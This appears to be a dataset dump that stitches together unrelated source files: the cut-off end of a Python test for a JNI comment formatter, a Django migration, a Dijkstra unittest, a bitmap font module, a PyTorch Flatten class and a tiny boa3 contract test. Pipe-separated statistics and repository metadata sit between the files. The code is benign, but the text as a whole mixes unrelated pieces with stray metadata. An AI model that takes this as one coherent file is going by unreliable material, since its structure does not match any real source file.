" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntries" + os.linesep + \
" * Signature: (ILjava/lang/String;I)[I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jintArray JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntries(JNIEnv* env," + os.linesep + \
" jclass, jint inst," + os.linesep + \
" jstring prefix," + os.linesep + \
" jint types) {" + os.linesep)
test.add_output("/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntries" + os.linesep + \
" * Signature: (ILjava/lang/String;I)[I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jintArray JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntries" + os.linesep + \
" (JNIEnv* env, jclass, jint inst, jstring prefix, jint types)" + os.linesep + \
"{" + os.linesep, True, True)
# Ensure functions with overloads are handled correctly
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: setRaw" + os.linesep + \
" * Signature: (IJ[BZ)Z" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jboolean JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_setRaw__IJ_3BZ" + os.linesep + \
" (JNIEnv* env, jclass, jint entry, jlong time, jbyteArray value," + os.linesep + \
" jboolean force)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Ensure text before JNIEXPORT and after args and ")" is handled correctly
# as well as two JNI functions in a row
test.add_input("./TestJNI.cpp",
"/**" + os.linesep + \
" *" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::GetDefaultInstance();" + os.linesep + \
"}" + os.linesep + \
os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getDefaultInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::GetDefaultInstance();" + os.linesep + \
"}" + os.linesep + \
os.linesep + \
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep, True, True)
# Handle function declarations properly
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getDefaultInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass);" + os.linesep + \
os.linesep + \
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep)
test.add_latest_input_as_output(True)
# Handle functions whose arguments don't have variable names properly
test.add_input("./DigitalGlitchFilterJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI" + os.linesep + \
" * Method: cleanFilter" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL Java_edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI_cleanFilter" + os.linesep + \
" (JNIEnv *, jclass, jint)" + os.linesep + \
"{" + os.linesep + \
" HAL_CleanFilter(handle);" + os.linesep + \
"}" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI" + os.linesep + \
" * Method: cleanFilter" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI_cleanFilter" + os.linesep + \
" (JNIEnv *, jclass, jint)" + os.linesep + \
"{" + os.linesep + \
" HAL_CleanFilter(handle);" + os.linesep + \
"}" + os.linesep, True, True)
test.run(OutputType.FILE)
| 49.629213
| 115
| 0.564335
| 1,275
| 13,251
| 5.669804
| 0.11451
| 0.255222
| 0.074561
| 0.122009
| 0.874671
| 0.842025
| 0.827639
| 0.799281
| 0.769678
| 0.754738
| 0
| 0.000537
| 0.297034
| 13,251
| 266
| 116
| 49.815789
| 0.775523
| 0.050864
| 0
| 0.753191
| 0
| 0
| 0.478666
| 0.208884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004255
| false
| 0
| 0.012766
| 0
| 0.017021
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
735aac3665747d3709eb2fe0b83c5afaced75ec6
| 2,028
|
py
|
Python
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 21
|
2016-01-20T09:33:14.000Z
|
2021-12-20T19:19:45.000Z
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 75
|
2016-02-26T16:29:58.000Z
|
2022-03-21T12:35:13.000Z
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 77
|
2016-01-22T08:44:26.000Z
|
2022-02-01T15:54:56.000Z
|
# Generated by Django 3.0.4 on 2020-05-11 16:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('protein', '0008_auto_20200422_1636'),
]
operations = [
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_dnorm',
),
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_mean',
),
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_sem',
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_dnorm',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_sem',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_dnorm',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_sem',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='log_rai_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='log_rai_sem',
field=models.FloatField(blank=True, null=True),
),
]
| 30.727273
| 59
| 0.57002
| 178
| 2,028
| 6.325843
| 0.252809
| 0.087922
| 0.273535
| 0.312611
| 0.856128
| 0.856128
| 0.856128
| 0.807282
| 0.611012
| 0.598579
| 0
| 0.031205
| 0.320513
| 2,028
| 65
| 60
| 31.2
| 0.785922
| 0.022189
| 0
| 0.694915
| 1
| 0
| 0.180717
| 0.01161
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016949
| 0
| 0.067797
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b405b039546c23a08559747231d884ab339f14b6
| 2,562
|
py
|
Python
|
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
import unittest
import sys
sys.path.append("..")
from Graph import Graph
from Dijkstra import *
class Graph_Test(unittest.TestCase):
def setUp(self):
self.graph = Graph()
def test_add_nodes(self):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
self.assertEqual(self.graph.nodes, set(['A', 'B', 'C', 'D', 'E', 'E', 'F', 'G']))
def test_shortest_path(self, ):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
self.graph.add_edge('A', 'B', 10)
self.graph.add_edge('A', 'C', 20)
self.graph.add_edge('B', 'D', 15)
self.graph.add_edge('C', 'D', 30)
self.graph.add_edge('B', 'E', 50)
self.graph.add_edge('D', 'E', 30)
self.graph.add_edge('E', 'F', 5)
self.graph.add_edge('F', 'G', 2)
dijkstra_output = dijkstra(self.graph, 'A')
self.assertEqual(shortest_path(self.graph, dijkstra_output,'A', 'E'), (55, ['A', 'B', 'D', 'E']))
self.assertEqual(shortest_path(self.graph, dijkstra_output,'A', 'G'), (62, ['A', 'B', 'D', 'E', 'F', 'G']))
def test_for_one(self, ):
self.graph.add_node('A')
dijkstra_output = dijkstra(self.graph, 'A')
self.assertEqual(shortest_path(self.graph, dijkstra_output,'A', 'G'), "There is no sense in your request!")
def test_for_dijkstra_heap(self):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
self.graph.add_edge('A', 'B', 10)
self.graph.add_edge('A', 'C', 20)
self.graph.add_edge('B', 'D', 15)
self.graph.add_edge('C', 'D', 30)
self.graph.add_edge('B', 'E', 50)
self.graph.add_edge('D', 'E', 30)
self.graph.add_edge('E', 'F', 5)
self.graph.add_edge('F', 'G', 2)
self.assertEqual(dijkstra_with_heap(self.graph, 'A', 'E'), (55, ['A', 'B', 'D', 'E']))
self.assertEqual(dijkstra_with_heap(self.graph, 'A', 'G'), (62, ['A', 'B', 'D', 'E', 'F', 'G']))
suite = unittest.TestLoader().loadTestsFromTestCase(Graph_Test)
unittest.TextTestRunner(verbosity=2).run(suite)
| 37.676471
| 115
| 0.569087
| 385
| 2,562
| 3.628571
| 0.142857
| 0.302792
| 0.326414
| 0.251969
| 0.758053
| 0.745884
| 0.730852
| 0.730852
| 0.684324
| 0.649964
| 0
| 0.018574
| 0.222482
| 2,562
| 67
| 116
| 38.238806
| 0.682731
| 0
| 0
| 0.666667
| 0
| 0
| 0.050742
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.083333
| false
| 0
| 0.066667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b41c918afea2e642f5c16129b47afcbb982706d1
| 8,115
|
py
|
Python
|
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | null | null | null |
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | null | null | null |
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | 2
|
2019-09-24T13:36:55.000Z
|
2020-04-18T02:05:38.000Z
|
# Code generated by font-to-py.py.
# Font: DejaVuSans.ttf
version = '0.26'
def height():
return 12
def max_width():
return 12
def hmap():
return False
def reverse():
return False
def monospaced():
return False
def min_ch():
return 32
def max_ch():
return 126
_font =\
b'\x06\x00\x02\x00\x72\x01\x1a\x00\x0c\x00\x00\x00\x00\x00\x04\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x7e\x01\x00\x00\x00\x00'\
b'\x05\x00\x0e\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x09\x00\x40\x00'\
b'\x48\x01\xf8\x00\x4e\x00\xc8\x01\x7c\x00\x4a\x00\x08\x00\x00\x00'\
b'\x07\x00\x18\x01\x24\x01\xfe\x07\x24\x01\xc4\x00\x00\x00\x00\x00'\
b'\x0a\x00\x0c\x00\x12\x00\x12\x01\xcc\x00\x30\x00\xcc\x00\x22\x01'\
b'\x20\x01\xc0\x00\x00\x00\x0a\x00\xe0\x00\x9c\x01\x12\x01\x22\x01'\
b'\x44\x01\x80\x00\x40\x01\x20\x01\x00\x00\x00\x00\x03\x00\x0e\x00'\
b'\x00\x00\x00\x00\x04\x00\xfe\x01\x01\x02\x00\x00\x00\x00\x04\x00'\
b'\x03\x03\xfc\x00\x00\x00\x00\x00\x06\x00\x24\x00\x18\x00\x7e\x00'\
b'\x18\x00\x24\x00\x00\x00\x09\x00\x20\x00\x20\x00\x20\x00\xfc\x01'\
b'\x20\x00\x20\x00\x20\x00\x00\x00\x00\x00\x04\x00\x00\x03\x00\x00'\
b'\x00\x00\x00\x00\x04\x00\x20\x00\x20\x00\x20\x00\x00\x00\x04\x00'\
b'\x00\x01\x00\x00\x00\x00\x00\x00\x04\x00\x00\x03\xe0\x01\x3c\x00'\
b'\x06\x00\x07\x00\xfc\x00\x86\x01\x02\x01\x86\x01\xfc\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x01\x02\x01\xfe\x01\x00\x01\x00\x01\x00\x00'\
b'\x00\x00\x07\x00\x04\x01\x82\x01\x42\x01\x22\x01\x1c\x01\x00\x00'\
b'\x00\x00\x07\x00\x84\x00\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00'\
b'\x00\x00\x07\x00\x60\x00\x50\x00\x48\x00\x44\x00\xfe\x01\x40\x00'\
b'\x00\x00\x07\x00\x1e\x01\x12\x01\x12\x01\x12\x01\xe0\x00\x00\x00'\
b'\x00\x00\x07\x00\xf8\x00\x14\x01\x12\x01\x12\x01\xe2\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x00\x02\x01\xe2\x00\x1a\x00\x06\x00\x00\x00'\
b'\x00\x00\x07\x00\xec\x00\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00'\
b'\x00\x00\x07\x00\x1c\x01\x22\x01\x22\x01\xa2\x00\x7c\x00\x00\x00'\
b'\x00\x00\x04\x00\x08\x01\x00\x00\x00\x00\x00\x00\x04\x00\x08\x03'\
b'\x00\x00\x00\x00\x00\x00\x09\x00\x60\x00\x60\x00\x60\x00\x90\x00'\
b'\x90\x00\x90\x00\x08\x01\x00\x00\x00\x00\x09\x00\x50\x00\x50\x00'\
b'\x50\x00\x50\x00\x50\x00\x50\x00\x50\x00\x00\x00\x00\x00\x09\x00'\
b'\x08\x01\x90\x00\x90\x00\x90\x00\x60\x00\x60\x00\x60\x00\x00\x00'\
b'\x00\x00\x06\x00\x02\x00\x72\x01\x1a\x00\x0c\x00\x00\x00\x00\x00'\
b'\x0c\x00\xf0\x00\x0c\x03\x04\x02\x62\x04\x92\x04\x92\x04\xf2\x04'\
b'\x86\x02\x44\x00\x78\x00\x00\x00\x00\x00\x07\x00\x00\x01\xe0\x00'\
b'\x5c\x00\x42\x00\x5c\x00\xe0\x00\x00\x01\x08\x00\xfe\x01\x12\x01'\
b'\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00\x00\x00\x08\x00\x78\x00'\
b'\x84\x00\x02\x01\x02\x01\x02\x01\x84\x00\x00\x00\x00\x00\x08\x00'\
b'\xfe\x01\x02\x01\x02\x01\x02\x01\x84\x00\x78\x00\x00\x00\x00\x00'\
b'\x07\x00\xfe\x01\x12\x01\x12\x01\x12\x01\x12\x01\x00\x00\x00\x00'\
b'\x06\x00\xfe\x01\x12\x00\x12\x00\x12\x00\x12\x00\x00\x00\x09\x00'\
b'\x78\x00\x84\x00\x02\x01\x02\x01\x22\x01\x22\x01\xe4\x00\x00\x00'\
b'\x00\x00\x08\x00\xfe\x01\x10\x00\x10\x00\x10\x00\x10\x00\xfe\x01'\
b'\x00\x00\x00\x00\x03\x00\xfe\x01\x00\x00\x00\x00\x03\x00\x00\x04'\
b'\x00\x04\xfe\x03\x07\x00\xfe\x01\x10\x00\x28\x00\x44\x00\x82\x00'\
b'\x00\x01\x00\x00\x06\x00\xfe\x01\x00\x01\x00\x01\x00\x01\x00\x01'\
b'\x00\x00\x09\x00\xfe\x01\x0c\x00\x30\x00\x40\x00\x30\x00\x0c\x00'\
b'\xfe\x01\x00\x00\x00\x00\x08\x00\xfe\x01\x06\x00\x18\x00\x60\x00'\
b'\x80\x01\xfe\x01\x00\x00\x00\x00\x09\x00\x78\x00\x84\x00\x02\x01'\
b'\x02\x01\x02\x01\x84\x00\x78\x00\x00\x00\x00\x00\x07\x00\xfe\x01'\
b'\x22\x00\x22\x00\x22\x00\x1c\x00\x00\x00\x00\x00\x09\x00\x78\x00'\
b'\x84\x00\x02\x01\x02\x01\x02\x03\x84\x02\x78\x00\x00\x00\x00\x00'\
b'\x07\x00\xfe\x01\x22\x00\x22\x00\x62\x00\x9c\x00\x00\x01\x00\x00'\
b'\x08\x00\x9c\x00\x12\x01\x12\x01\x12\x01\x22\x01\xe4\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x00\x02\x00\x02\x00\xfe\x01\x02\x00\x02\x00'\
b'\x02\x00\x08\x00\xfe\x00\x80\x01\x00\x01\x00\x01\x80\x01\xfe\x00'\
b'\x00\x00\x00\x00\x07\x00\x06\x00\x18\x00\x60\x00\x80\x01\x60\x00'\
b'\x18\x00\x06\x00\x09\x00\x06\x00\x78\x00\x80\x01\x70\x00\x0e\x00'\
b'\x70\x00\x80\x01\x78\x00\x06\x00\x07\x00\x02\x01\x86\x01\x48\x00'\
b'\x30\x00\x48\x00\x86\x01\x02\x01\x07\x00\x02\x00\x04\x00\x08\x00'\
b'\xf0\x01\x08\x00\x04\x00\x02\x00\x09\x00\x02\x01\x82\x01\x42\x01'\
b'\x32\x01\x0a\x01\x06\x01\x02\x01\x00\x00\x00\x00\x04\x00\xfe\x07'\
b'\x02\x04\x00\x00\x00\x00\x04\x00\x06\x00\x3c\x00\xe0\x01\x00\x03'\
b'\x04\x00\x02\x04\xfe\x07\x00\x00\x00\x00\x09\x00\x08\x00\x0c\x00'\
b'\x06\x00\x02\x00\x06\x00\x0c\x00\x08\x00\x00\x00\x00\x00\x06\x00'\
b'\x00\x02\x00\x02\x00\x02\x00\x02\x00\x02\x00\x02\x06\x00\x00\x00'\
b'\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x07\x00\xc0\x00\x28\x01'\
b'\x28\x01\x28\x01\xf0\x01\x00\x00\x00\x00\x07\x00\xff\x01\x08\x01'\
b'\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00\x06\x00\xf0\x00\x08\x01'\
b'\x08\x01\x08\x01\x00\x00\x00\x00\x07\x00\xf0\x00\x08\x01\x08\x01'\
b'\x08\x01\xff\x01\x00\x00\x00\x00\x07\x00\xf0\x00\xa8\x01\x28\x01'\
b'\x28\x01\xb0\x00\x00\x00\x00\x00\x04\x00\x08\x00\xfe\x01\x09\x00'\
b'\x09\x00\x07\x00\xf0\x00\x08\x05\x08\x05\x08\x05\xf8\x03\x00\x00'\
b'\x00\x00\x07\x00\xff\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00'\
b'\x00\x00\x03\x00\xfa\x01\x00\x00\x00\x00\x03\x00\x00\x04\xfa\x07'\
b'\x00\x00\x06\x00\xff\x01\x20\x00\x50\x00\x88\x00\x00\x01\x00\x00'\
b'\x03\x00\xff\x01\x00\x00\x00\x00\x0b\x00\xf8\x01\x08\x00\x08\x00'\
b'\x08\x00\xf0\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00\x00\x00'\
b'\x07\x00\xf8\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00\x00\x00'\
b'\x07\x00\xf0\x00\x08\x01\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00'\
b'\x07\x00\xf8\x07\x08\x01\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00'\
b'\x07\x00\xf0\x00\x08\x01\x08\x01\x08\x01\xf8\x07\x00\x00\x00\x00'\
b'\x05\x00\xf8\x01\x10\x00\x08\x00\x08\x00\x00\x00\x07\x00\xb0\x00'\
b'\x28\x01\x28\x01\x48\x01\xd0\x00\x00\x00\x00\x00\x04\x00\x08\x00'\
b'\xfe\x01\x08\x01\x08\x01\x07\x00\xf8\x00\x00\x01\x00\x01\x00\x01'\
b'\xf8\x01\x00\x00\x00\x00\x06\x00\x18\x00\x60\x00\x80\x01\x80\x01'\
b'\x60\x00\x18\x00\x09\x00\x78\x00\x80\x01\x60\x00\x18\x00\x60\x00'\
b'\x80\x01\x78\x00\x00\x00\x00\x00\x06\x00\x08\x01\x90\x00\x60\x00'\
b'\x60\x00\x90\x00\x08\x01\x07\x00\x00\x00\x18\x04\x60\x04\x80\x03'\
b'\x80\x01\x60\x00\x18\x00\x05\x00\x08\x01\x88\x01\x48\x01\x28\x01'\
b'\x18\x01\x07\x00\x20\x00\x20\x00\xde\x07\x02\x04\x02\x04\x00\x00'\
b'\x00\x00\x04\x00\xfe\x0f\x00\x00\x00\x00\x00\x00\x07\x00\x02\x04'\
b'\x02\x04\xde\x07\x20\x00\x20\x00\x00\x00\x00\x00\x09\x00\x40\x00'\
b'\x20\x00\x20\x00\x60\x00\x40\x00\x40\x00\x20\x00\x00\x00\x00\x00'\
_index =\
b'\x00\x00\x0e\x00\x18\x00\x20\x00\x2c\x00\x40\x00\x50\x00\x66\x00'\
b'\x7c\x00\x84\x00\x8e\x00\x98\x00\xa6\x00\xba\x00\xc4\x00\xce\x00'\
b'\xd8\x00\xe2\x00\xf2\x00\x02\x01\x12\x01\x22\x01\x32\x01\x42\x01'\
b'\x52\x01\x62\x01\x72\x01\x82\x01\x8c\x01\x96\x01\xaa\x01\xbe\x01'\
b'\xd2\x01\xe0\x01\xfa\x01\x0a\x02\x1c\x02\x2e\x02\x40\x02\x50\x02'\
b'\x5e\x02\x72\x02\x84\x02\x8c\x02\x94\x02\xa4\x02\xb2\x02\xc6\x02'\
b'\xd8\x02\xec\x02\xfc\x02\x10\x03\x20\x03\x32\x03\x42\x03\x54\x03'\
b'\x64\x03\x78\x03\x88\x03\x98\x03\xac\x03\xb6\x03\xc0\x03\xca\x03'\
b'\xde\x03\xec\x03\xfa\x03\x0a\x04\x1a\x04\x28\x04\x38\x04\x48\x04'\
b'\x52\x04\x62\x04\x72\x04\x7a\x04\x82\x04\x90\x04\x98\x04\xb0\x04'\
b'\xc0\x04\xd0\x04\xe0\x04\xf0\x04\xfc\x04\x0c\x05\x16\x05\x26\x05'\
b'\x34\x05\x48\x05\x56\x05\x66\x05\x72\x05\x82\x05\x8c\x05\x9c\x05'\
b'\xb0\x05'
_mvfont = memoryview(_font)
def _chr_addr(ordch):
offset = 2 * (ordch - 32)
return int.from_bytes(_index[offset:offset + 2], 'little')
def get_width(s):
width = 0
for ch in s:
ordch = ord(ch)
ordch = ordch + 1 if ordch >= 32 and ordch <= 126 else 32
offset = _chr_addr(ordch)
width += int.from_bytes(_font[offset:offset + 2], 'little')
return width
def get_ch(ch):
ordch = ord(ch)
ordch = ordch + 1 if ordch >= 32 and ordch <= 126 else 32
offset = _chr_addr(ordch)
width = int.from_bytes(_font[offset:offset + 2], 'little')
next_offs = _chr_addr(ordch +1)
return _mvfont[offset + 2:next_offs], width
| 51.687898
| 68
| 0.699199
| 1,903
| 8,115
| 2.967945
| 0.079874
| 0.288952
| 0.259738
| 0.193343
| 0.610305
| 0.523194
| 0.436792
| 0.318166
| 0.251416
| 0.1875
| 0
| 0.399381
| 0.044116
| 8,115
| 156
| 69
| 52.019231
| 0.328735
| 0.006531
| 0
| 0.078571
| 1
| 0.735714
| 0.821792
| 0.818069
| 0
| 1
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0
| 0.05
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b429e42a10695ba92435caa1540e4753e897d00e
| 156
|
py
|
Python
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 16
|
2021-04-06T11:57:39.000Z
|
2022-03-02T12:18:24.000Z
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 1
|
2021-10-30T02:11:57.000Z
|
2021-11-12T01:30:59.000Z
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T07:54:34.000Z
|
2022-01-06T07:54:34.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
| 22.285714
| 36
| 0.685897
| 28
| 156
| 3.821429
| 0.642857
| 0.308411
| 0.242991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.192308
| 156
| 7
| 36
| 22.285714
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
b44f6f63c27938b280983fb7be784cf93bd448f0
| 41
|
py
|
Python
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
a: int
def Main() -> int:
return a
| 6.833333
| 18
| 0.512195
| 7
| 41
| 3
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.341463
| 41
| 5
| 19
| 8.2
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
